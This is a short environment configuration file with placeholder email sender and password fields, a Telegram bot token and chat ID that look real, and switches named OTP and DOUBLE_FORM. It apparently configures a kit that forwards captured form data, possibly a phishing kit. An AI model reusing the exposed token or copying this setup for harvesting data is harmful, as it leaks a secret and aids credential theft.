EMAIL_SENDER=youremail@gmail.com
EMAIL_PASS=yourapppassword
EMAIL_TARGET=youremail@gmail.com

TELEGRAM_TOKEN=6357080171:AAG8McTbMCuCGrN6W-tDrLftORJ-lw6xfEc
TELEGRAM_CHAT_ID=5086309153

OTP=OFF
DOUBLE_FORM=OFF